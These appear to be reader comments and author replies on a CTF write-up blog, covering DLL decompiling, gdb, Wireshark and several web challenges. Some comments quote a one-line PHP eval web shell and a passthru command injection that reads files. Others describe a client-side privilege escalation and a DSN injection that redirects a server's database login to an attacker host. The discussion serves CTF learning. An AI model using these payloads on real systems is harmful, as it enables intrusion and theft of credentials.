Hello Tsuka 🙂
In fact you can simply parse the decompiled C code.
You don’t need to call the functions from outside.
1) Sort all the variables v2, v3, v4 etc.. as I did.
2) For each variable there’s a function called, which will return a value.
I’ll take another more detailed example, not in my cropped source code :
v22 = sub_6FAC10B0; //Here v22 = the variable, sub_6FAC10B0 is the function
If you search the function named sub_6FAC10B0 in your decompiled code, you’ll find :
signed int sub_6FAC10B0()
{
return 50;
}
The final value of the variable v22 will be 50.
3) The function returns an integer (notice the “signed int” before the name).
It’s not a binary value and there are no letters A-F, so it can only be a decimal form.
You have to take the value the 50 and convert it in ASCII which gives 2.
v22 = 2; //50 in decimal.
4) When you have all the numbers, pass theses to a converter from decimal to ASCII.
This is an explanation of my code in python :
– it splits the string with all the values you gave it
– for each number it converts it in an ASCII value
– prints the final ASCII string

I hope it will be easier to understand now 🙂

Exactly what decompiler did you use? I’m a beginner and would like to have proper tools from the start. I used ret-dec and it didn’t give me the proper ascii.

We commonly use IDA Pro for reversing and decompiling. WtF did this challenge, but given his decompiling result, I would assume he used IDA.
(I’ll let him confirm though)

Yes I used IDA 🙂
You can also decompile the DLL with :
– Hopper
– the Capstone engine + a python decompiler script
– radeco

From IDA, how did you get the result to look so “readable”. Mine mostly came out with assembly commands.

You have to use the decompiler (and not just stay in disassembler mode) :
File / Produce file / Create C file…

If you haven’t all the returned int values in the file, you have to attach the DLL to rundll32.exe:
– Choose windbg as debugger
– Debugger / Process options…
– Application : rundll32.exe

As example:
– howtouse_without_windbg.txt
– howtouse_with_windbg.txt

Thank you very Much.

Hi,
It was a .php file with the content:
<script language=PHP>eval($_GET['q']);</script>

Hello Diaa
Strange, I tried what I wrote in the WU, and it’s working fine:
– Download the .zip archive from the link above.
– Extract the “stream” file.
– Open it with Wireshark.

You’re welcome!
We try at most to popularize how to solve the challenges.
It’s good to know that the goal seems reached!
Thank you 🙂

Mhh I’m quite sure for having tried it … however it should not :/
By the way pel0tas, do you have full write-ups for the other levels? :p

This will depend on CTF organizers!
And…in fact we must thank them too 🙂

The flag has changed during the night because somoene leaked the original one on IRC.

Hello!
Write ups are coming 🙂
EKO admins asked to do NOT post solutions until monday.
(The first teams needs to prove their validations)

Hello!
As it was useless, I didn’t kept any log for this.
I’m quite sure having used binwalk with the options -e -M.
Maybe the firmware mod kit too!

Hey there !
Questions are welcome ! To answer yours, there are different possibilities to run a binary with gdb, but the easiest way is when you open gdb in your command line interface, you give it a parameter : your binary name. Once you are in gdb prompt, you can run your binary :

$ gdb MOV
(gdb) r

Regarding your second question about “breakpoint register”, I’m not sure I fully understand what you meant. Could you be a bit more specific, or could you quote the part in this write up that isn’t clear for you ?

If you have any other questions, please do not hesitate 🙂

See ya !

unzip reversing100.zip
file MOV
chmod +x MOV
./MOV
gdb MOV
(gdb) r
(gdb) b *0x0804c2f9
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/MOV 
        __                              __          
  ____ |  | ______ ___________ ________/  |_ ___.__.
_/ __ \|  |/ /  _ \\____ \__  \\_  __ \   __<   |  |
\  ___/|    <  <_> )  |_> > __ \|  | \/|  |  \___  |
 \___  >__|_ \____/|   __(____  /__|   |__|  / ____|
     \/     \/     |__|       \/             \/     

Processing...
Error


Breakpoint 1, 0x0804c2f9 in ?? ()

Hey, we have different outputs because I’m using peda (https://github.com/longld/peda).

This is how it’s done without it :

$ gdb -q MOV
Reading symbols from MOV...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/hackndo/MOV 
  
[...]

Processing...
Error


Program received signal SIGILL, Illegal instruction.
0x0804c2f9 in ?? ()

Ok, it stops at 0x0804c2f9. As I said in my write up, I placed a breakpoint right *before* this instruction, at 0x804c2f3 :

(gdb) b *0x804c2f3
Breakpoint 1 at 0x804c2f3
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hackndo/MOV 

[...]

Processing...
Error


Breakpoint 1, 0x0804c2f3 in ?? ()

Ok, let’s take a look at the stack

(gdb) x/16xw $esp
0x85f6660:  0x0804d3d0  0x5f6c6c41  0x5f756f59  0x6465654e
0x85f6670:  0x5f73495f  0x0076306d  0x00000000  0x00000000
0x85f6680:  0x00000000  0x00000000  0x00000000  0x00000000
0x85f6690:  0x085f66a0  0x88048563  0x00000001  0xffffd0b4

First value looks like an address, next values look like ascii char. Let’s see this :

(gdb) x/s 0x0804d3d0
0x804d3d0:  "Error\n\n"
(gdb) x/s $esp+0x4
0x85f6664:  "All_You_Need_Is_m0v"
(gdb)

And here is the flag. But I’m going to say this again : This was a lucky guess, because we didn’t solve this as expected. We only got lucky. You should take a look at other reverse write up to see how it’s really done. 🙂

You’re most welcome !

We like to suffer 🙂
If there is as good challenges as this one, maybe we’ll try the final CTF 😉

Hi,

I have compiled myself both PHP 5.4.45 and APC 3.1.13 on ubuntu 15.04 x64.
If you get segmentation fault, make sure you have not version conflicts (eg: used system phpize instead of freshly compiled 5.4 phpize when compiling APC)

Hello rea and thanks!
I think it was probably known through word of mouth then 🙂

Hash-Mode | Hash-Name           | Example
400       | phpass, MD5(phpBB3) | $H$984478476IagS59wHZvyQMArzfx58u.

Source: https://hashcat.net/wiki/doku.php?id=example_hashes
(Moreover a hint was given with a link to “Queen – We will rock you” :D)

Yeah, I can use it on Ubuntu 15.04 x64. Thank you 🙂

First of all congratulations with your scores.
Could you please write of tell me the writeup for the “simplepassword” challenge from hackover ctf. I came till the 4th or 5th part, but nu further.

Thank you in advance.

Greets Bas

Thanks buddy 🙂

Write up online for the challenge “simplepassword”. Greets.

Write up online for the challenge “simplepassword”. Greets.

I found the following code in a .js that was included in the html (http://nicklesndimes-wq3mhu8l.9447.plumbing/js/mellivora.js):

function whitelist_ip(i,t){
  $.post("admin/actions/new_ip_whitelist",{action:"new",user_id:i,ip:t})
}

It was possible to execute whitelist_ip( 1, YOUR_IP ); from the developer console when logged in with a regular user, then log out / login with admin => works!.

I tried to add my own IP with a XHR request from this JS like you said but was KO for me.
That’s why I finally used this header. 🙂
Maybe someone has later added the IP for 9447.plumbing and I used it!
Thanks for the reply, good to see our ideas are never useless 😀

I’m currently learning more about the CTF reading and learning from your posts. Therefore, I’d like to ask something about your code, because I can’t understand the way you did it.

if(crypted[i]<='9'&&crypted[i+1]<='9')
hex.push_back((crypted[i]-'0')*16+(crypted[i+1]-'0'));
else if(crypted[i]<='9')
hex.push_back((crypted[i]-'0')*16+(crypted[i+1]-'a'+10));
else if(crypted[i+1]<='9')
hex.push_back((crypted[i]-'a'+10)*16+(crypted[i+1]-'0'));
else
hex.push_back((crypted[i]-'a'+10)*16+(crypted[i+1]-'a'+10));

I really don't understand why you are taking two numbers and comparing them to '9'. If you could explain my how it works I would really appreciate it.

Second, why the golden number size is shorter than the output.enc? Shouldn't be the same size or longer?

Best,
Niemand

Hi Niemand,

the crypted text is composed of letters from a to z and of digits from 0 to 9 (or maybe I converted it, I don’t remember honestly). That’s why I use a comparaison with ‘9’ : when char is not <= '9', we can be sure it is located between 'a' and 'f'. Basically the code you mentioned is a conversion from 'xx' (2 hex string) to char.
(for instance, '10' is converted to char 16, 'a2' is converted to char 162, …)

Secondly, I chose the golden number size in order to have a valid file at the end of the process, so that can explain it isn't exactly the same size as output.enc (I modified it a posteriori).

Hope it's understandable,
best,
Alkanor

passthru(“cat /var/www/html/tmp/upload_aaaa;ls -la;cat /* 2>&1”);

the sudoer restriction:
http://pastebin.com/wdM64Grv

the timestamp of sudoer file:
-r–r—– 1 root root 786 Jan 30 12:02 sudoers
$ date
Sun Jan 31 12:46:48 UTC 2016

unfortunately the organizers didn’t deal with this (despite my request).

Actually, I don’t think it would have worked, as there is “if (isset($_SESSION[‘user’])” before the upload.
If you change your session id, the PHP will not recognise you anymore and you’ll not be able to upload, and then to inject your commands in the passthru.

Enjoy

The lsd

I did it on saturday afternoon GMT+1, it worked fine, excepted that the flag file was readable only some times. I had to reload my sudo cat multiple times to have the file content.

Maybe someone else was trying to modify the sudo at the same time.

(Just in case, that wasn’t me who stucked the challenge ^^’, I think it stupid…)

Enjoy

The lsd

i would like to apologize, i have just checked it tonight, and in my client/server implementation i still used my previous send_test function (so not the final one) to make that pcap file (eheh comment). Hence, the double \x78\x9c is indeed not correct, and at the third packet, i wanted to reproduce the structure of payload, but instead of DWORD,i used to put a single byte… Glad you got it with my mistakes (i will get you some beer!)

just a note: the junk you get at the end is due to the length you use for decrypt, you have a key of 32 bytes, and you make the decrypt on a length of 64 bytes (so on some undetermined data). By the way, the 0x20 acting for payload length in the third packet was here to say it’s 32 bytes long.

another note: on the stegano chall, the strings command on the image returns “code rate is 0.571”, that would have been the hint for the size of generator matrix used.

regards,
Big5

Thanks for your feedback, I waited it for a looooong time 🙂
Even if there was some bugs, it was a really nice challenge. I loved to bang my head against the wall during hours.
Concerning the junk data at the end of the decrypted text, the goal for me was to find something (at least the beginning of the flag), so I didn’t racked my brain to strip the junk.
I hope you’ll do other networking challenges for the next NDH (but without bug please :p)

Oh, and I’m always ready for beer, just tell me when and where, I’ll be there 🙂

Enjoy

The lsd

Thanks for you answer, it’s always nice to have some author reviews!

If you wan’t to make other pcap challs, please don’t hesitate, fun networking challenges are so uncommon 🙂

Enjoy

The lsd

Forget to say: your writeup is excellent, Thx!

https://gist.github.com/Macmod/130e780a69ec6d41d7bd57612314a541

Thanks for pointing that out, your gist has 404 :(.
But the real problem is, why printf does’nt flush when appending a newline ? That’s also bothering me in that case.

My bad, I erased it by mistake 😛

Perhaps printf is flushing the buffer, but socat holds it? I really have no idea who’s to blame, exactly.

https://gist.github.com/anonymous/6d70a68a8bd4efc4c86c98b28c21f0c3

Sorry for the delay, I didn’t saw your comment.

Actually, there were 3 steps :
– I allowed mysql to answer for every IP (bind-address 0.0.0.0)
– As my computer was behind my firewall, I had to create a firewall rule to allow the webserver to request the port TCP/3306 and a Destination NAT rule to forward these requests to my mysql server
– Finally, I used a network sniffer. I tried with the tcpdump like tool that was on my firewall, but it was a bit messy, so I used wireshark, which was installed on the computer which ran mysqld.

If you need firther explaination, just post another comment, I’ll answer fastly 🙂

Enjoy

The lsd

Thanks for your support!
Your write-up is very useful. It helps me to improve my knowledge. I’ll try it!

I use apktool to decompile 🙂

Actually, we can just guess how the $dsn is on the server side. But we can easily suppose that $dsn looks like this :

‘mysql:dbname=’.$_POST[‘group’].’;host=127.0.0.1′

The default group value is users, so $dsn will be ‘mysql:dbname=users;host=127.0.0.1’

As I modified group value to ‘tableOnMyOwnSQLInstance;host=1.2.3.4’ (assuming 1.2.3.4 is my public IP which will listen for incoming connections), $dsn value is as followed:

‘mysql:dbname=tableOnMyOwnSQLInstance;host=1.2.3.4;host=127.0.0.1’

As the PDO class cannot connect to multiple hosts (which is quite logical actually 🙂 ), it will choose the first IP : mine!

Then, I have been a bit lucky. During the first test, I saw, that the PDO class tried to connect onto my SQL instance with the user “erpay” (as seen on the wireshark screenshot). So I just created an SQL user “erpay” with a password “erpay”.
When relaunching my test, the PDO class sent credentials and the authentication worked like a charm, meaning that my totally random choosen password was the good one 🙂

The last step has been to look at the attempted request, create the same table, and relaunch a last time my test. With the good table/fields, the requests was OK and the flag have been written onto my SQL instance.

If my explanations are a bit messy, or if you have other questions, feel free to reply me 🙂

Enjoy

The lsd

the file name is keylog.log and I followed what you write
Edit > Preferences > Protocols > TLS
(Pre)-Master-Secret log filename: File containing the `CLIENT_RANDOM` lines.
but there is no difference in the pcap file I used rdp as a filter but there is no any rdp packets
can you help

even when I tried this
We export the decoded Wireshark’s session into rerdp.pcap by selecting File > Export PDUs and selecting OSI Layer 7.
I get an empty file